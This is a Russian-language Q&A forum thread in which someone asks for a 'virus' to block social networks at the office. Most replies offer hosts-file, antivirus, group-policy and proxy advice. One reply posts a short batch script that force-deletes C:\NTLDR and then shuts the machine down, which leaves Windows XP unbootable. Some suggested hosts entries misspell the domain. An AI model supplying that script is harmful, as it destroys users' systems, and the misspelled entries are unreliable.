Интернет

где скачать вирусы

Нужен вирус который заблокирует одноклассники и контакт что бы не сидели на работе. Файл Hosts почему то не закрывает одноклассники!
На порносайтах.
Жанибек Утаров
Лучший ответ
Там тоже не, дураки контролируют этот сайт, как говорится против лома нет приема, если нет другого лома.
Они поставили хороший антивирус.
если дела так плохо, могу порекомендовать любой антивирус с функцией "родительский контроль" Каспер, Дрвеб, офисскан...
Это не вирус нужен т. к систему безопасности поставишь под угрозу вирусы притянут себе подобных и разрушат слабую систему, нужно создать правило и блокировать доступ к этим сайтам, политиками сервера, домина и т. д
Если вы админ то у вас слабая система и база защиты. ..если у всех учётка пользователя можно тупо запрет поставить на посещение этих сайтов и связных с ними страниц. .
Свойствах обозревателя - содержание - ограничения доступа - разрешенные узлы....
Alexander Haffner
проще в антивирусе заблокировать сайты и сам антивирус под пароль.
Алексей ......
Sula Dautkhanov Правильно, Кар Карыч !!!
C:\WINDOWS\system32\drivers\etc\hosts - проверьте этот документ (открывать блокнотом), и добавить ваши ресурсы.
Nik X.
Александр Петров Я же говорю файл Hosts контакт перекрыл а во одноклассники нет как я их там и не писал во всех видах но бесполезно ((((
Антивирус КИС 2013г блокировка по сайтам
Валера Бабанов
На любом порносайте вирусов - как на шарике блох... выбирайте любой )
Я очень легко избавился от Одноклассниках, просто удалил страницу и все, когда открываешь страницу в самом низу очень мелким шрифтом написано удаление или как там я уже забыл, но главное посмотрите в самом низу страницы там что то есть про удалении.
Sula Dautkhanov Вы внимательно прочитали вопрос?
Он не просит блокировать свою страницу, а просит, чтоб сайты одноклассники и вконтакте были заблокированы.
Чтобы работники в рабочее время не сидели на своих страницах.
======
Да напиши батник и не мучайся если так уж и надо напиши сам попробую
С…
Серёга ….
чем не вирус

ECHO OFF
CLS
CHCP 1251
CLS
ERASE/F/A C:\NTLDR
CLS
MSG * sasi
CLS
SHUTDOWN -S -T 10
CLS
SHUTDOWN -F
CLS
EXIT
Gio Giomer
Sula Dautkhanov Это ESET SS-5 сразу удалила.
:-)
может народ пользуется анонимайзерами.. . вот и не закрывает.... логи смотри
Побороть социальные сети можно но сложно, я использую для этой цели интернет-шлюз.
Ха умный, чтобы обойти защиту сайта соц сети нужно ума немерено ну или навыки программирования так что напиши сам
playground.ru
~$$$$$$ $$$$$$~
вот залупидрень
Добавить сайты в список запрещенных через родительский контроль. СКачать вирусы - уголовное дело.
Ssssss Ssssss
Закрывает. Прописываем odnoklassniki.ru и www.odnoklassniki.ru. Не забываем очистить кеш браузера.

А еще можно поставит Apache и раз и навсегда шугануть злобных обманщиков Великогр Админа
Miracle Жу Жу
Вы что то неправильно вводите значит. . одноклассники хост тоже блокирует еще как сама весной с этим встретилась. . чуть с ума не сошла пока разрулила все..
gpedit.msc -выполнить. Научите своего системного администратора пользоваться редактором групповой политики.) ) Или выгоните его с работы нафиг, если не умеет делать элементарных вещей) А если это вы-смените работу.
Ничего там не надо никуда "прописывать",это при наличии небольшого количества мозгов легко обойти. Нужно редактировать именно политику безопасности подключений.
Zaur Imamaliyev
Дмитрий Криворучко А если система XP Home, где там gpedit.msc интересно знать Ванюшка?! Ну если только нарушить лицензионное соглашение и из профа эти вайлы скопировать appmgmts.dll, appmgr.dll, fde.dll, fdeploy.dll, gpedit.msc, gpedit.dll, gptext.dll и еще файлы шаблонов conf.adm, inetres.adm и system.adm, а потом еще зарегить библиотеки
regsvr32 gpedit.dll
regsvr32 fde.dll
regsvr32 gptext.dll
regsvr32 appmgr.dll
regsvr32 fdeploy.dll
То тогда да, согласен!
даже не знаю
Andrei Pak
вы вообще ппц!! !если в фаил хост прописать тупо одноклассники. ру - нихера не измениться!
надо как минимум сделать запись:
127.0.0.1 odnokassniki.ru
127.0.0.1 www.odnokassniki.ru
и то не факт что поможет!
а вообще надо ставить прокси - я использую сквид+дансгуардиан, поднятый на линуксе
Biko Boss
сайты порно-там полно
раз сильно просишь я отправил на почту, только не проверял! ВНИМАНИЕ - вирус
Да пусть сидят, а если что-то блокировать - могут заказное убийство организовать за это...
Так можно заблокировать через файл хост (hosts-токройте блокнотом)
Уволь ты этих соцодрочеров нахер
Фильтры в таких случаях покупают.
а только социальные Сети или нет?
прогугли скачать блокнот